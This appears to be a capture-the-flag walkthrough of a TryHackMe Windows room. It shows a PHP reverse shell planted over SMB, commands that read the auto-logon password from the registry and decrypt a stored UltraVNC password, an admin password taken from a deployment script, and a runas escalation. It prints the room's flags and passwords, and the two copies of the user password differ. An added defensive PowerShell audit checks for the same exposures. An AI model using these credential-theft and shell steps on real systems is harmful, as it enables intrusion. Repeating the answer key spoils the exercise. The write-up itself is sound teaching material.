Room: https://tryhackme.com/room/allsignspoint2pwnage

I usually write my articles assuming the reader has little to no prior knowledge. However, this particular room was a bit lengthy and "not a straightforward one", so I'll be writing with the assumption that you'll be able to catch up with the flow as you progress through the room.


Step 1: Nmap Scan

nmap -sS -sV -p- 10.10.140.232 -vv

How many TCP ports under 1024 are open?

6

Step 2: FTP Access

Logged into FTP using default/anonymous creds.

Found a notice.txt:

(Screenshot: contents of notice.txt)

Step 3: SMB Enumeration

Anonymous access worked. I found some image files and uploaded a reverse shell.

Pentestmonkey's reverse shell wasn't working; I needed to use this one here!

(Screenshot: SMB shares)

(Screenshot: uploading the reverse shell via SMB)

Reverse shell triggered via browser:

http://10.10.140.232/images/phpshell.php

What is the hidden share where images should be copied to?

images$

Step 4: Got Shell!

Started a listener and caught the shell.

Enumeration

(Screenshot: user flag)

Who is signed into the console session? → sign

What hidden, non-standard share is only remotely accessible as an admin? → ADMIN$ (C:\Windows)

What is the content of user_flag.txt?

thm{48u51n9_5y573m_func710n4117y_f02_fun_4nd_p20f17}

Credential Discovery

As per the hint ("The user is automatically logged into the computer. On Windows, auto-login credentials are stored at..."), I queried the Winlogon registry key:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Found:

DefaultUsername : .\sign
DefaultPassword : gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeS
(Screenshot: user password)

What is the user's password?

gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeSH

Now, admin password:

Checked Installs$ share (mapped to C:\Installs), used:

type C:\Installs\Install_www_and_deploy.bat

Install_www_and_deploy.bat contains:

psexec -u administrator -p RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi ...
(Screenshot: admin password)

What is the Administrators Password?

RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi

What executable is used to run the installer with the Administrator username and password?

PsExec.exe (visible in the same file above: `psexec -u administrator -p ...`)

VNC Password:

Located ultravnc.ini:

type "C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini"

Found the stored passwd value:

(Screenshot: ultravnc.ini passwd line)

To decode it, I used the following logic (UltraVNC stores the password DES-encrypted under a fixed key, which is why a known key can be passed to openssl) and ran:

echo -n B3A8F2D8BEA2F1FA70 | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

What is the VNC Password?

5upp0rt9
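As an added example (not from the room or this writeup), here is a PowerShell audit that checks a host for the three plaintext-credential exposures used above: the Winlogon DefaultPassword value, a password passed to psexec in deployment scripts, and a stored UltraVNC passwd line. The C:\Installs folder and the ultravnc.ini path are taken from the room; the function names and the regex are my own.

```powershell
# Added audit script (not part of the room or this writeup). Checks the three
# plaintext-credential exposures the walkthrough relied on and suggests a fix.

function Get-AutoLogonExposure {
    # Winlogon auto-logon keeps the password in a plain REG_SZ value.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $wl  = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    $hit = [bool]$wl.DefaultPassword
    [pscustomobject]@{
        Check   = 'Winlogon auto-logon'
        Exposed = $hit
        Finding = if ($hit) { "DefaultPassword set for $($wl.DefaultUserName)" } else { 'no DefaultPassword value' }
        Fix     = "Remove-ItemProperty -Path '$key' -Name DefaultPassword (and disable AutoAdminLogon)"
    }
}

function Get-ScriptCredentialExposure {
    # Assumed path from the room; scans deployment scripts for "psexec ... -p <pw>" or "password=".
    param([string[]]$Paths = @('C:\Installs'))
    $pattern = '(?i)(\bpsexec\b.*\s-p\s+\S+|\bpassword\s*=\s*\S+)'
    Get-ChildItem -Path $Paths -Recurse -Include *.bat,*.cmd,*.ps1 -ErrorAction SilentlyContinue |
        Select-String -Pattern $pattern | ForEach-Object {
            [pscustomobject]@{
                Check   = 'Credential in script'
                Exposed = $true
                Finding = "$($_.Path):$($_.LineNumber)"
                Fix     = 'Strip the password; run the installer as a scheduled task or service account instead'
            }
        }
}

function Get-VncPasswordExposure {
    # Assumed default install path (as seen in the room). UltraVNC encrypts passwd
    # with a fixed DES key, so read access to the file equals knowing the password.
    param([string]$IniPath = 'C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini')
    if (-not (Test-Path -LiteralPath $IniPath)) { return }
    $line = Select-String -LiteralPath $IniPath -Pattern '^\s*passwd\s*=' | Select-Object -First 1
    [pscustomobject]@{
        Check   = 'UltraVNC stored password'
        Exposed = [bool]$line
        Finding = if ($line) { "passwd= present at line $($line.LineNumber)" } else { 'no passwd= line' }
        Fix     = 'Restrict the ACL on ultravnc.ini to SYSTEM/Administrators and keep the folder off any share'
    }
}

# Run all checks and list only the exposures found.
@(Get-AutoLogonExposure; Get-ScriptCredentialExposure; Get-VncPasswordExposure) |
    Where-Object Exposed | Format-Table Check, Finding, Fix -Wrap
```

Run it from an elevated PowerShell session so the registry key and the Program Files path are readable.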

Now last admin_flag.txt:

Connected via xvncviewer (the other remote desktop tools weren't working for this room):

xvncviewer -QualityLevel 2 10.10.75.85
  • 1: Double click on user_flag.txt.
  • 2: Change the contents of the user_flag.txt file to:
runas /user:administrator cmd.exe
  • 3: Save the file as pwn2.bat and double click to run it.
  • 4: Enter the previously found admin password when prompted.

Once admin shell opened:

type C:\Users\Administrator\Desktop\admin_flag.txt

What is the contents of the admin_flag.txt?

thm{p455w02d_c4n_83_f0und_1n_p141n_73x7_4dm1n_5c21p75}
